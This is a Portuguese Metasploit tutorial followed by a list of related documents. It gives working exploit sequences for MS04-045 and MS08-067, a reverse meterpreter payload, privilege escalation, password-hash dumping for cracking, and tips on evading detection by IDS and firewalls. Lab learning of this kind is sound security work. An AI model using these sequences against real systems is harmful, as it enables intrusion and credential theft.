|
|
- Cristiana Sampaio Galindo
- 6 Há anos
- Visualizações:
Transcrição
1 O Metasploit é um framework criado por H.D.Moore, que serve para elaboração e execução de um repositório de exploits. Os meus maiores agradecimentos ao H.D. Moore e sua equipe por tornarem um sonho realidade Agora que todos já sabem o que é o Metasploit, vamos aprender a trabalhar com ele. Lembrando que este tutorial só tem o objectivo de aprendizagem, cada um é responsável pelos seus actos. De qualquer forma, e devido a certos requesitos dos testes de intrusão deverão usar sempre proxy a não ser que usem um Lab com VM s Uma das coisas que hoje já existe no metasploit é uma interface gráfica via browser que simplifica o processo, apesar de aconselhar a usarem o cliente tipo linha de comandos (msfcl) A interface gráfica é o msfweb - Interface gráfica via browser Vou usar o linux mas há também a versão para windows. Então levando em consideração que tenham instalado no vosso PC e está a funcionar, vamos dar uma vista sobre a utilização desta SUPER PODEROSA FERRAMENTA... um sonho tornado realidade... para mim que ainda me lembro quando para fazer isto era preciso dezenas de tools e procedimentos... agora tá tudo integrado numa plataforma/framework. Vou também ter o cuidado de usar vulnerabilidades antigas e exploits ultrapassados para que não possa ser usado como guia total para um ataque, visto cobrir todo o percurso de exploitation. Mas basta seleccionar outros exploits para as novas coisinhas... Vejam também a, digamos, o irmão web que é a excelente w3af "Web Application Attack and Audit Framework." Apesar do metasploit também estar preparado para ataques web, mas eu especializei-me nos dois e é melhor trabalhar com as duas em conjunto. O metasploit possui várias ferramentas dentre elas: (e muitas mais para vocês explorarem... explorem os payloads, os exploits e todos os outros utilitários. Podem fazer-lo lendo ou explorando nos ficheiros ou com comandos do tipo "show payloads" ou "show exploits", entre outros.) msfconsole - metasploit em modo console msfcli - interface de automatização de penetração e exploração msflogdump - exibe sessões de arquivos de log msfplayload - usado para gerar payloads customizados
2 msfpescan - utilizado para analisar e descompilar executáveis e DLLs msfencode - um codificador interactivo de payload encoder msfupdate - utilizado para verificar e fazer download de actualização do framework msfweb - Interface gráfica via browser Hoje devido ao facto do metasploit estar na Rapid7 podem usar uma versão gratuita do detector de vulnerabilidades automático, o NeXpose Community Edition... ele detecta as vulnerabilidades e integra-se com o metasploit. Nexpose (Detector de vulnerabilidades) Podem, como eu, usar o Nessus para isso ou outras ferramentas... hoje até o nmap têm scripts para detectar vulnerabilidades, que são a principal questão no exploitation... é a partir de uma vulnerabilidade que tudo acontece e precisam saber a versão exacta do software alvo e do SO... em alguns casos no windows até a língua em que o windows esta. Algo essencial para se escolher o exploit certo é saber o serviço e a versão exacta do mesmo, pois os exploits são feitos nessa base. Para tal e se soubermos já que há uma vulnerabilidade para um apache 2 versão anterior à 2.15, podemos fazer um scan especifico com o Nmap a essa porta (80) para não dar nas vistas. É como se alguem tivesse a aceder ao site, pois apenas são enviados pacotes para a porta 80. Se fizerem um scan a todas as portas e houver algum equipamento de jeito no caminho vai detectar que é um scan e corta. Saibam o que procurar e não façam scans a todas as portas, a não ser que não haja qualquer equipamento especial, como acontece na maioria dos datacenters para as contas mais baixas. As mais usadas. Nmap st P0 A version-all T0 p 80 ipalvo (o T0 é para que haja maior espaço de tempo entre o envio de pacotes, para dificultar a detecção. Mas não é uma técnica de evasão e pode ser dispensado. O Nmap têm diversas técnicas de evasão, como spoofing, etc... explorem a documentação) Nessus (Detector de vulnerabilidades) O Nessus é um motor que interpreta scripts em NASL (ver artigo meu na 3ª Edição - Julho de 2006 que explica melhor esta linguagem) e envia-os contra um ou mais alvos, fazendo um relatório dos resultados. Estes scripts procurar milhares de vulnerabilidades, mas apensa as conhecidas. Podem desenvolver os vossos próprios scripts NASL para coisas novas. Voltando ao Metasploit, eu vou ensinar aqui a utilizar somente três destas ferramentas(msfconsole, msfcli, msfweb), pois acredito que um verdadeiro :smoke: aprenderá sozinho o restante... como sempre dou a base para futuras explorações. Ajuda ao ensino e evita script kiddies msfconsole:
3 Primeiramente digita-se na linha de comando : [root]#./msfconsole se for no windows só digite msfconsole sem./, continuando deverá aparecer algo como: (neste caso já foi usado o comando show exploits para se ter uma lista dos exploits. O comando show serve para outras coisas como payloads e opções. Ver em detalhe) Para quem dá o primeiro passo pode executar o comando help para ver os comandos de consola. Atenção que isto são apenas os comandos de consola e não todas as suas funcionalidades.
4 Como vimos na primeira imagem do mestasploit e a nivel formativo, pois no mundo a sério já saberão que exploit usar, será: show [opção] (a opção poderá ser uma das que vos aparecerão senão digitarem nenhuma, como podem ver no exemplo em seguida desta forma: msf > show msfconsole: show: requires an option: 'exploits', 'payloads', 'encoders', or 'nops' msf > Viram que apareceram as opções deste comando. O mesmo acontece com outros comandos, pois podem ir assim explorando a framework. Para saberem quais os exploits que existem nesta framework (desde a ultima actualização, devem ir actualizando o metasploit que está em constante evolução) basta digitar o comando: msf >show exploits;
5 Para saber os payloads que existem neste framework basta digitar o comando: show payloads e assim por diante. Então dentro do ambiente do metasploit escolhemos o exploit assim com o comando use :
6 msf > use wins_ms04_045 viram que eu escolhi o wins_ms04_045 e o prompt mudou. Utilizando para isto o comando: use continuando... Digitamos o nosso velho amigo : show, novamente para verificar quais atributos ele aceita. Vejamos: show msfconsole: show: specify 'targets', 'payloads', 'options', or 'advanced' Vimos aqui que ele aceita targets, payloads, options ou advanced. Vamos verificar quais opções que este exploit já seleccionado aceita:
7 show options Exploit Options =============== Exploit: Name Default Description required RHOST The target address required RPORT 42 The target port Target: Target Not Specified Este exploit aceita somente duas opções : o ip alvo e a porta alvo. Agora deves estar a perguntar... como faço para utilizar isto. Simples, basta configurar o que o exploit aceita (há diferenças entre exploits e cada vez mais, pois mais complexidade e vectores são adicionados, diferenciando cada vez mais os exploits), lembrando que onde estiver escrito required, significa que estas opções tem que ser configuradas obrigatoriamente para o exploit funcionar. Continuando... Façamos assim: set RHOST RHOST -> msf wins_ms04_04> set RPORT 42 RPORT -> 42 Vejam que utilizei a mesma porta que o valor por default... Agora teremos que seleccionar o payload para o nosso exploit. O payload nada mais é que um software acoplado ao exploit para fazer as mais variadas tarefas. Digitamos então o comando para saber os payloads suportados pelo nosso exploit: show payloads show payloads Metasploit Framework Usable Payloads
8 ==================================== win32_adduser Windows Execute net user /ADD win32_bind Windows Bind Shell win32_bind_dllinject Windows Bind DLL Inject win32_bind_meterpreter Windows Bind Meterpreter DLL Inject win32_bind_stg Windows Staged Bind Shell win32_bind_stg_upexec Windows Staged Bind Upload/Execute win32_bind_vncinject Windows Bind VNC Server DLL Inject win32_exec Windows Execute Command win32_passivex Windows PassiveX ActiveX Injection Payload win32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Payload win32_passivex_stg Windows Staged PassiveX Shell win32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Payload win32_reverse Windows Reverse Shell win32_reverse_dllinject Windows Reverse DLL Inject win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject win32_reverse_ord Windows Staged Reverse Ordinal Shell win32_reverse_ord_vncinject Windows Reverse Ordinal VNC Server Inject win32_reverse_stg Windows Staged Reverse Shell win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute win32_reverse_vncinject Windows Reverse VNC Server Inject Eu vou escolher o primeiro payload, que faz com que seja adicionado remotamente um utilizador no sistema windows (como tenho dito tanto sobre os payloads, hoje já há payloads para tudo e todos os SO s até uma shell especial para cracking que é o meterpreter) O meterpreter é um complexo payload que é uma espécia de shell especial para cracking, com funcionalidades especificas para isso. Algo que já falei bastante também. Documento onde é detalhado técnicamente o meterpreter: Caso queiram usar o meterpreter, na selecção do payload, escolham um com meterpreter, como por exemplo win32_reverse_meterpreter... isto vai criar uma sessão no alvo, com o meterpreter e como é reverse passa pelas firewalls, pois estas pensam que como vem de dentro da rede é confiável.
9 Assim: set PAYLOAD win32_adduser jolie PAYLOAD win32_adduser -> jolie msf wins_ms04_045> Vamos agora listar os sistemas operativos que serão os alvos: Utilizando o velho comando : show, só que agora assim: show targets show targets Supported Exploit Targets ========================= 0 Windows 2000 English Só temos uma opcao aqui, somente o windows 2000 em ingles é vulneravel, mas tudo bem... set TARGET 0 TARGET -> 0 tamos mesmo, mesmo, mesmo a um tirinho de caçadeira... valeu a pena chegar aqui... pois agora apenas falta uma coisa para completar nossa tarefa... Executar o nosso exploit, que é mais um pacote exploit (conjunto de várias coisas que antigamente se faziam em separado e com muito trabalho) do que somente um exploit. Digite somente: exploit (lindo não? Isto é disparar o exploit em direcção ao alvo. ATENÇÃO. Só usar alvos virutais ou máquinas voças exploit E pronto...acabamos a nossa primeira etapa, agora vamos passar para o msfcli. O msfcli é utilizado para poder fazer tudo de uma só vez. Nao precisando do passo a passo descrito acima. Se nós ja conhecemos o exploit isto agiliza muito o nosso trabalho na linha de comando digitamos assim:
10 [root]#./msfcli wins_ms04_045 RHOST = RPORT=42 PAYLOAD=win32_adduser teste TARGET=0 E e vejam que faz a mesma coisa que no modo console. Caso o exploit se direcione a um serviço sem previlégios especiais pode-se usar um exploit local para escalar previlégios ou os seguintes comandos do meterpreter. Atenção que neste caso terão de estar a usar o meterpreter (para isso terão na altura de selecção do payload escolher um especial com o meterpreter, como por exemplo win32_reverse_meterpreter) E na sessão do meterpreter usem os scripts já existentes para isso, como apresento em baixo. meterpreter> use priv meterpreter> getsystem Mais coisas interessantes que se podem fazer com o meterpreter em conjunto com outras ferrametas geniáis, como o LophtCrack ou o Cain e Abel para crackar hashes de passwords. Has passwords estão codificadas mas podem ser sacadas e posteriormente crackadas... garanto que conseguirão algumas que não sejam muito fortes, o que é muito normal. Por exemplo. Como fazer o dump das hashes das passowrds com o meterpreter e fazer o download para depois as crackarem com algum dos programas anteriormente mencionados..msfconsole > use windows/smb/ms08_067_netapi > set PAYLOAD windows/meterpreter/reverse_tcp > set LHOST (meu Ip) > set RHOST (Ip Remoto) > exploit > getuid > hashdump > use -f cmd -c Para fazer downloads ou uploads dentro do meterpreter, entre o vosso PC e o alvo comprometido. meterpreter> download arquivo1 arquivo2 pastadestino meterpreter> upload arquivo1 arquivo2 pastadestino
11 Para crackar as hashes eu uso o LOphtCrack. É só guardar o resultado do "hashdump" num.txt (meuhash.txt) e usa-lo no LOphtCrack. Garanto que terão algumas passwords interessantes. (investiguem também a familia Pwdump... muito interessante para certas situações.) Citar pwdump is the name of various Windows programs that output the LM and NTLM password hashes of local user accounts from the Security Account Manager (SAM). In order to work, it must be run under an Administrator account, or be able to access an Administrator account on the computer where the hashes are to be dumped; so Pwdump does not compromise security. Most of these programs are open-source. (aqui são explicadas as várias cores e sabores e seus links) Vamos passar para uma forma ainda mais fácil. Garanto que o ppl mais windows vão adorar esta forma, que é um GUI (Grafical User Interface... mas no mundo dos exploits? Sim... vejam) Trata-se da ferramenta msfweb que quando executado permite fazermos tudo por uma pagina web, todas as funcionalidades aplicaveis estão lá. Para acederem ao GUI do metasploit façam: [root]#./msfweb +----=[ Metasploit Framework Web Interface (ip:55555) Deixar correr... Abrir em seguida o browser e digitar o url: teu ip, localhost, Mais a porta Seria assim: E assim verão a magia desta ferramenta. Um rico GUI onde facilmente qualquer um pode configurar uma sessão completa, sem digitar comandos em consolas. Claro que no alvo vão (ou não) usar a consola, pois é mais... Poderemos com isto fazer tudo graficamente sem digitar comandos etc etc, somente seleccionando. Para complementar e devido a essas novas IPS e IDS que detectam padrões de tráfego e podem ser actualizadas com as assinaturas dos novos exploits, aqui fica um extra dedicado às novas appliances PANDA Com um tunnel SSH o tráfego vai encriptado e não é possível identificar o mesmo, o que
12 vai dentro dessa sessão. É uma das mais usadas técnicas de evasão, Criando uma sessão meterpreter persistente sobre um túnel SSH (integrando com o metasploit) Podem ver muitos videos que até já apresentei alguns, com tudo isto em "real" e muito mais... investiguem por ai, pois há magia no ar teckv
Metasploit Sabe o que é?
Metasploit Sabe o que é? é uma plataforma que permite a verificação do estado da segurança dos computadores existentes numa determinada rede, permitindo atacar as falhas de segurança existentes nos mais
Leia maisMetasploit Hands On. Rafael Soares Ferreira Clavis Segurança da Informação
Metasploit Hands On Rafael Soares Ferreira Clavis Segurança da Informação rafael@clavis.com.br $ whoami Grupo Clavis Sócio Diretor Técnico Análise forense computacional Detecção e resposta a incidentes
Leia maisO projeto Metasploit é um framework que foi criado em 2003 por HD Moore e é uma plataforma que permite a verificação do estado da segurança dos
O projeto Metasploit é um framework que foi criado em 2003 por HD Moore e é uma plataforma que permite a verificação do estado da segurança dos computadores existentes numa determinada rede, permitindo
Leia maisArmitage, ferramenta de gerenciamento de ataque cibernético
Armitage, ferramenta de gerenciamento de ataque cibernético Alex Sander 22 de março de 201622 de março de 2016 3 Comentários O Armitage é uma ferramenta de gerenciamento de ataques cibernéticos em modo
Leia maisIntrodução ao Metasploit Framework
Introdução ao Metasploit Framework Veremos o Metasploit Framework, uma ferramenta que tornou-se padrão para pentesters. Lançado pela primeira vez em 2003, Metasploit alcançou status na comunidade de segurança.
Leia maisFormação em Segurança Cibernética. Sessão 4 Explorando vulnerabilidades em redes
Formação em Segurança Cibernética Sessão 4 Explorando vulnerabilidades em redes Levantamento de Vulnerabilidades Ferramentas - HPING A ferramenta HPING é um gerador e analisador de pacotes TCP/IP muito
Leia maisFerramenta Nessus e suas funcionalidades
Ferramenta Nessus e suas funcionalidades Alberto S. Matties 1 1 Curso Superior de Tecnologia em Redes de Computadores Rua Gonçalves Chaves 602 96.015-000 Pelotas RS Brasil 2 FACULDADE DE TECNOLOGIA SENAC
Leia maisWindows 10: Aprenda a abrir um porto na Firewall
Windows 10: Aprenda a abrir um porto na Firewall Date : 28 de Novembro de 2017 Não desligue a Firewall crie regras! Todos nós temos a noção que é importante dispormos de mecanismos de segurança nos nossos
Leia maisFerramentas Web, Web 2.0 e Software Livre em EVT
E s t u d o s o b r e a i n t e g r a ç ã o d e f e r r a m e n t a s d i g i t a i s n o c u r r í c u l o d a d i s c i p l i n a d e E d u c a ç ã o V i s u a l e T e c n o l ó g i c a FFONTS M a n
Leia maisNO-IP - Eu quero um IP fixo!
NO-IP - Eu quero um IP fixo! Date : 5 de Janeiro de 2009 Quantos vezes já esteve na situação de precisar de algo que está no vosso computador lá em casa e não conseguir chegar remotamente a ele? A ideia
Leia maisAprenda a usar a Firewall do Windows 8 (Parte I)
Aprenda a usar a Firewall do Windows 8 (Parte I) Date : 20 de Março de 2013 Não desligue a Firewall.crie regras! Todos nós temos a noção que é importante dispormos de mecanismos de segurança nos nossos
Leia maisNSA HACKING. Jonathan Messias Washington Silas
NSA HACKING Jonathan Messias jonathan.messias@gemina.io Washington Silas washington.souza@gemina.io Introdução O que é o WannaCry? O ransomware WannaCry visa redes que usam SMBv1, um protocolo que ajuda
Leia maisRaspbian XFCE + XBMC v3 via Comunidade Linux Pplware
Raspbian XFCE + XBMC v3 via Comunidade Linux Pplware Date : 8 de Outubro de 2013 Tenha a melhor performance no seu Raspberry PI O Raspberry Pi é um dos mini PCs mais populares e potentes, que tem servido
Leia maisAndré Luis Staroski Clovis Cristiano Brignoli Fabiano F. Maciel Guimarães
André Luis Staroski Clovis Cristiano Brignoli Fabiano F. Maciel Guimarães O Nmap é um portscan de uso geral; O Nmap está disponível em todas as principais distribuições; O uso mais simples é escanear
Leia maisAprenda a instalar a plataforma de monitorização Cacti
Aprenda a instalar a plataforma de monitorização Cacti Date : 27 de Março de 2014 Um administrador deve possuir as melhores ferramentas de monitorização para que tenha uma visão facilitada de toda a rede.
Leia maisAprenda a instalar o GLPI no Centos 6.5
Aprenda a instalar o GLPI no Centos 6.5 Date : 31 de Janeiro de 2014 Solução fantástica para Gestão total do seu parque informático: Experimente já aqui Quando se é administrador de um parque informático
Leia maisIDES E PROGRAMAÇÃO. Prof. Dr. Cláudio Fabiano Motta Toledo PAE: Maurício A Dias
1 IDES E PROGRAMAÇÃO Prof. Dr. Cláudio Fabiano Motta Toledo PAE: Maurício A Dias {claudio,macdias}@icmc.usp.br 2 Agenda Conceitos Instalação e Configuração Compilação e Execução de Código IDEs Exemplo
Leia maisTRABALHO INTRUSÃO DE REDES
TRABALHO INTRUSÃO DE REDES Software Metasploit Framework O que é > Metasploit Framework é uma avançada plataforma Open Source, concebida especificamente com o objetivo de reforçar e acelerar o desenvolvimento,
Leia maisManual de iniciação para AZBox Elite/Premium
Manual de iniciação para AZBox Elite/Premium Elaborado por @lagosta Desenvolvido para http://www.dragteam.info/forum/ Versão 0.1 Para quem está interessado em pôr a AZBOX Elite HD a bombar (salvo erro
Leia maisAnalisar e demonstrar a aplicação da ferramenta Metasploit. Vmware Player, Putty, Backtrack, Windows Server 2003, CentOS e Metasploit.
Unidade Curricular Segurança em Redes Prof. Eduardo Maroñas Monks Aluno Gérson Porciúncula Siqueira Roteiro de Laboratório Ferramentas de Segurança - Metasploit Objetivo: Analisar e demonstrar a aplicação
Leia maisTransforme o seu CentOS num servidor Web (LAMP)
Transforme o seu CentOS num servidor Web (LAMP) Date : 9 de Outubro de 2013 Todos nós sabemos que as distribuições Linux são extremamente potentes e flexíveis, e que a maioria dos servidores, espalhados
Leia maisGuia da Aula Prática H.323. Página 1 de 5
Guia da Aula Prática H.323 A ficha seguinte deve ser executada a partir de grupos de 3 PCs, sendo que por PC deverá estar um grupo de alunos. Dois PCs serão os clientes e o terceiro será o Gatekeeper.
Leia maisServiços de Informática :: Divisão de Infraestruturas e Serviços :: Universidade de Évora
Guia de utilização do Colibri Instalação do software Criar Sessão Consultar as sessões criadas Participar numa sessão Gravação de Sessões Iniciar a gravação de uma sessão Descarregar a gravação Versões
Leia maisGuia de utilização do servidor da disciplina
Sistemas Operativos Escola de Tecnologias e Arquitectura Dep. de Ciências e Tecnologias da Informação Servidor da disciplina tigre.iul.lab Guia de utilização do servidor da disciplina 1 Introdução Os diferentes
Leia maisSobre o Visual C++ 2010
O Visual Studio é um pacote de programas da Microsoft para desenvolvimento de software, suportando diversas linguagens como C#, C++, C, Java, Visual Basic, etc. Nesta série de tutoriais vou focar apenas
Leia maisTutorial: Criar um servidor SFTP no Windows para acesso remoto
Tutorial: Criar um servidor SFTP no Windows para acesso remoto Date : 4 de Março de 2017 Antes da massificac?a?o de servic?os baseados na "nuvem como o Dropbox, Google Drive, OneDrive, entre outros, o
Leia maisBases de Dados. Lab 1: Introdução ao ambiente. Figura 1. Base de dados de exemplo
Departamento de Engenharia Informática 2013/2014 Bases de Dados Lab 1: Introdução ao ambiente 1º semestre O ficheiro bank.sql contém um conjunto de instruções SQL para criar a base de dados de exemplo
Leia maisGuião para a instalação do Ubuntu (Versão 1.1 em 30 Set 07)
MIEEC 2007/08 Ramo Automação Disciplina Sistemas de Informação Empresariais Guião para a instalação do Ubuntu (Versão 1.1 em 30 Set 07) Introdução Este documento foi elaborado com o propósito de auxiliar
Leia maisFundamentos de Ethical Hacking EXIN. Guia de Preparação. Edição
Fundamentos de Ethical Hacking EXIN Guia de Preparação Edição 201701 Copyright EXIN Holding B.V. 2017. All rights reserved. EXIN is a registered trademark. No part of this publication may be reproduced,
Leia maisMetasploit Framework Versão 2.2 User Crash Course
Metasploit Framework Versão 2.2 User Crash Course Introdução Este documento é uma tentativa de prover um guia do usuário para a versão 2.2 do Metasploit Framework e tem como principais objetivos dar uma
Leia maisQuando a máquina terminar o arranque e lhe pedir as credenciais para entrar, introduza as seguintes:
Segurança Informa tica e nas Organizaço es Vulnerabilidades na Web (V1.1) Este trabalho deve ser realizado na máquina virtual Ubuntu10tm que pode descarregar de ftp://www.ieeta.pt/avzdatastore/vulnerable%20linux/ubuntu10tm.zip,
Leia maisFerramentas Web, Web 2.0 e Software Livre em EVT
E s t u d o s o b r e a i n t e g r a ç ã o d e f e r r a m e n t a s d i g i t a i s n o c u r r í c u l o da d i s c i p l i n a d e E d u c a ç ã o V i s u a l e T e c n o l ó g i c a AnimPixels M a
Leia maisCross-Site Scripting (XSS): Entendendo o conceito e seus tipos
Cross-Site Scripting (XSS): Entendendo o conceito e seus tipos Talvez a vulnerabilidade de segurança de aplicações web mais comum e mais debatido é Cross-Site Scripting (XSS). Quando tais vulnerabilidades
Leia maisInstalando o software de gerencia (ANM2000)
Instalando o software de gerencia (ANM2000) Descrição: Para ter a gerencia das OLTs e ONUs da rede FTTx, precisa ser instalado o software de gerencia da Fiberhome, chamado ANM2000. Requisitos: - Servidor
Leia maisINSTALAÇÃO QGIS VERSÃO LTR EM WINDOWS
Este documento, aborda o processo de instalação da versão LTR (long term release) do QGIS em ambiente Windows. Existem duas formas de instalação do QGIS em ambiente Windows: Versão Standalone, é a instalação
Leia maisChegou o Pipplware 3.1 com suporte para o novo Raspberry 2
Chegou o Pipplware 3.1 com suporte para o novo Raspberry 2 Date : 9 de Fevereiro de 2015 O PiPplware é uma distribuição Linux portuguesa para o Raspberry PI baseada e 100% compatível com o Raspbian, a
Leia maisConheça 5 dicas que deve usar já no seu Windows 10
Conheça 5 dicas que deve usar já no seu Windows 10 Date : 20 de Fevereiro de 2017 O Windows 10 está a ser construído pela Microsoft de forma progressiva. A cada nova versão surgem melhorias substanciais
Leia maisWindows Server 2008 Vamos criar um domínio
Windows Server 2008 Vamos criar um domínio Date : 25 de Outubro de 2013 No Pplware temos abordado as características e funcionalidades dos mais diversos sistemas operativos. Apesar de hoje em dia os sistemas
Leia maisActualizações de software Manual do utilizador
Actualizações de software Manual do utilizador Copyright 2009 Hewlett-Packard Development Company, L.P. Microsoft é uma marca registada da Microsoft Corporation nos E.U.A. As informações contidas neste
Leia maisInstalação do ClearOS como Gateway/Firewall Parte I
Instalação do ClearOS como Gateway/Firewall Parte I Date : 30 de Novembro de 2012 Por Tiago Ramalho para o PPLWARE.COM O ClearOS Community é um sistema operativo desenhado para pequenas e médias empresas,
Leia maisCONFIGURAÇÃO DA CAIXA DE CORREIO ELETRÓNICO
CONFIGURAÇÃO DA CAIXA DE CORREIO ELETRÓNICO Outlook 2013 / 2016 & definições genéricas Criado/ Revisto Por: Revisto em: Contacto: DI-IPS Maio 2017 Apoio.informatico@ips.pt ÍNDICE Introdução... 4 Configuração
Leia maisCONFIGURAÇÃO DA CAIXA DE CORREIO ELETRÓNICO
CONFIGURAÇÃO DA CAIXA DE CORREIO ELETRÓNICO Outlook 2013 / 2016 & definições genéricas Criado/ Revisto Por: Revisto em: Contacto: DI-IPS Março 2017 Apoio.informatico@ips.pt Fevereiro 2018 ÍNDICE Índice...
Leia maisIMPORTANTE: é fundamental que o IP das câmeras esteja dentro da faixa da sua rede, senão a comunicação não será possível.
Instalando e configurando câmeras IP Wanscam séries JW e AJ Todas as câmeras IP funcionam por meio de rede de comunicação do tipo ethernet, que é o padrão mundial de rede de computadores. Esta rede pode
Leia maisEOLPP. Manual do utilizador
EOLPP Manual do utilizador Introdução... 3 Objetivos... 3 Convenções de Linguagem... 3 Acesso à EOLPP... 4 Funcionalidades Comuns a Todas as Páginas... 6 Página Principal... 7 Consultas... 8 Download da
Leia maisDica - Como remover a tabela de Partição GUID (GPT)
Dica - Como remover a tabela de Partição GUID (GPT) Date : 5 de Agosto de 2013 Necessita de instalar o Windows 8? Então vai ter problemas! No inicio desta semana, após as tradicionais actualizações do
Leia maisFerramentas Web, Web 2.0 e Software Livre em EVT
E s t u d o s o b r e a i n t e g r a ç ã o d e f e r r a m e n t a s d i g i t a i s n o c u r r í c u l o d a d i s c i p l i n a d e E d u c a ç ã o V i s u a l e T e c n o l ó g i c a Drawpile M a
Leia maisDectando falha no IMAP para explorar com exploits do Metasploit. Inj3cti0n P4ck3t
Dectando falha no IMAP para explorar com exploits do Metasploit Inj3cti0n P4ck3t São Paulo 2010 Nome: Fernando Henrique Mengali de Souza Contato: fer_henrick@hotmail.com Linguagem de Programação: Perl
Leia maisConselho Geral da Ordem Dos Advogados Departamento Informático
Nota Introdutória: Este documento destina-se a guiá-lo(a) através dos vários procedimentos necessários para configurar a sua caixa de correio da Ordem dos Advogados, no programa Windows Live Mail Versão
Leia maisAuditando e criando relatório de análise de vulnerabilidades com Nessus
Auditando e criando relatório de análise de vulnerabilidades com Nessus Ciência Hacker 8 de novembro de 2015 Deixe um comentário Nessus é uma das ferramentas mais recomendadas para fazer análise de vulnerabilidade,
Leia maisGuia de apoio à utilização. de serviços WFS, através do software GeoMedia
Guia de apoio à utilização de serviços WFS, através do software GeoMedia junho de 2015 1 Índice I. Guia de apoio à utilização de serviços WFS... 3 II. Problemas mais comuns no acesso ao serviço WFS...
Leia maisFerramentas Web, Web 2.0 e Software Livre em EVT
E s t u d o s o b r e a i n t e g r a ç ã o d e f e r r a m e n t a s d i g i t a i s n o c u r r í c u l o d a d i s c i p l i n a d e E d u c a ç ã o V i s u a l e T e c n o l ó g i c a Urban Painter
Leia maisProteja-se configurando bem o Windows Defender no Windows 10
Proteja-se configurando bem o Windows Defender no Windows 10 Date : 29 de Novembro de 2016 Os antivírus são uma presença obrigatória nos sistemas operativos para proteger os utilizadores contra todos os
Leia maisEste curso pretende dotar os participantes dos conhecimentos e conceitos básicos envolvidos na operação dos sistemas operativos Linux (GNU/Linux).
Linux Fundamentos Tecnologias de Informação - Redes e Sistemas Localidade: Lisboa Data: 05 Jun 2017 Preço: 420 ( Os valores apresentados não incluem IVA. Oferta de IVA a particulares e estudantes. ) Horário:
Leia maisSabe fazer backups do Windows 10? E recuperar ficheiros?
Sabe fazer backups do Windows 10? E recuperar ficheiros? Date : 4 de Janeiro de 2017 Com os perigos a que estamos expostos hoje em dia, é importante ter preparados backups e outros mecanismos para salvaguardar
Leia maisESET Remote Administrator Versão 6.5
ESET Remote Administrator Versão 6.5 Guia Rápido Índice 1. Objetivo 3 2. Componentes 4 2.1 Servidor ERA / Agente / Certificados 4 3. Licenciamento 5 4. Métodos de Instalação 6 4.1 Instalação Servidor ESET
Leia maisDica: Como criar uma pen de instalação do OSX El Capitan
Dica: Como criar uma pen de instalação do OSX El Capitan Date : 4 de Outubro de 2015 Tal como prometido pela Apple, de forma indirecta, o OSX 10.11 El Capitan chegou esta semana. Com várias novidades,
Leia maisComo acessar as imagens via Navegador Mozilla Firefox
Como acessar as imagens via Navegador Mozilla Firefox Antes de iniciar o procedimento de como realizar o(s) Acesso(s) Remoto(s) (Endereço IP em Rede Local, ou via Nuvem, ou via DDNS) através do Navegador
Leia maisGuia Técnico v6.1 SNMP TG Conteúdo
Manual Guia Técnico de Administração v6.1 - Conteúdo Introdução 3 Definições 3 Protocolos suportados 3 MIB suportadas 4 Configuração 4 Views e Communities 4 Acessos 6 Traps 6 Utilização 7 Download de configurações
Leia maisO Windows desde... sempre! - Parte #0
O Windows desde... sempre! - Parte #0 Date : 23 de Março de 2010 No seguimento de um artigo aqui publicado há alguns meses, A história do Windows em recursos do sistema!, que criou saudade a muitos e curiosidade
Leia maisTutoriais de Segurança de Redes
Tutoriais de Segurança de Redes Ricardo Kléber (ricardokleber@ricardokleber.com) Lição 01 :: Metasploit Básico Iniciando uma série de lições de utilização de soluções/ferramentas para a prática de segurança
Leia maisGLPI Gestão total e gratuita do seu parque informático
GLPI Gestão total e gratuita do seu parque informático Date : 20 de Maio de 2016 Quando se é administrador de um parque informático de escala média/grande é importante possuir as melhores plataformas para
Leia mais8 DE NOVEMBRO DE 2015
Auditando e criando relatório de análise de vulnerabilidades com Nessus 8 DE NOVEMBRO DE 2015 Nessus é uma das ferramentas mais recomendadas para fazer análise de vulnerabilidade, devido apresentar uma
Leia maisFerramentas Web, Web 2.0 e Software Livre em EVT
E s t u d o s o b r e a i n t e g r a ç ã o d e f e r r a m e n t a s d i g i t a i s n o c u r r í c u l o d a d i s c i p l i n a d e E d u c a ç ã o V i s u a l e T e c n o l ó g i c a MyPaint M a n
Leia maisDESCRIÇÃO E JUSTIFICATIVAS TECNICAS SOBRE A INFLUÊNCIA DO SISTEMA OPERACIONAL NA SEGURANÇA DOS SERVIÇOS IPS
DESCRIÇÃO E JUSTIFICATIVAS TECNICAS SOBRE A INFLUÊNCIA DO SISTEMA OPERACIONAL NA SEGURANÇA DOS SERVIÇOS IPS 1. Introdução O crescimento e a quantidade de recursos disponíveis na Internet tem chamado a
Leia maisFerramentas Web, Web 2.0 e Software Livre em EVT
Ferramentas Web, Web 2.0 e Software Livre em EVT E s t u d o s o b r e a i n t e g r a ç ã o d e f e r r a m e n t a s d i g i t a i s n o c u r r í c u l o d a d i s c i p l i n a d e E d u c a ç ã o
Leia maisBases de Dados. Lab 1: Introdução ao ambiente
Departamento de Engenharia Informática 2009/2010 Bases de Dados Lab 1: Introdução ao ambiente 1º semestre O ficheiro bank.sql contém um conjunto de instruções SQL para criar a base de dados de exemplo
Leia maisFundamentos de Ethical Hacking EXIN. Guia de Preparação
Fundamentos de Ethical Hacking EXIN Guia de Preparação Edição Junho 2016 Copyright 2016 EXIN All rights reserved. No part of this publication may be published, reproduced, copied or stored in a data processing
Leia maisVerifique a Conectividade do servidor Radius com comando dos radius AAA do teste
Verifique a Conectividade do servidor Radius com comando dos radius AAA do teste Índice Introdução Pré-requisitos Requisitos Componentes Utilizados Informações de Apoio Como a característica trabalha Sintaxe
Leia maisNetwork Camera. Guia do SNC easy IP setup Versão de software 1.0 Antes de operar o aparelho, leia todo este manual e guarde-o para referência futura.
4-441-095-71 (1) Network Camera Guia do SNC easy IP setup Versão de software 1.0 Antes de operar o aparelho, leia todo este manual e guarde-o para referência futura. 2012 Sony Corporation Índice Salvar
Leia maisAprenda a instalar e configurar o FreeNAS (Parte I)
Aprenda a instalar e configurar o FreeNAS (Parte I) Date : 15 de Novembro de 2014 O FreeNAS é uma solução gratuita e livre de servidor NAS (Network Attached Storage) baseada no FreeBSD. Suporta diversos
Leia maisIntrodução ao C# (CSharp)
Introdução ao C# (CSharp) Date : 26 de Novembro de 2008 Nos dias que correm quem está no mundo da informática urge por importantes noções sobre programação. Não menos importante é estar actualizado nessa
Leia maisCriar uma máquina virtual
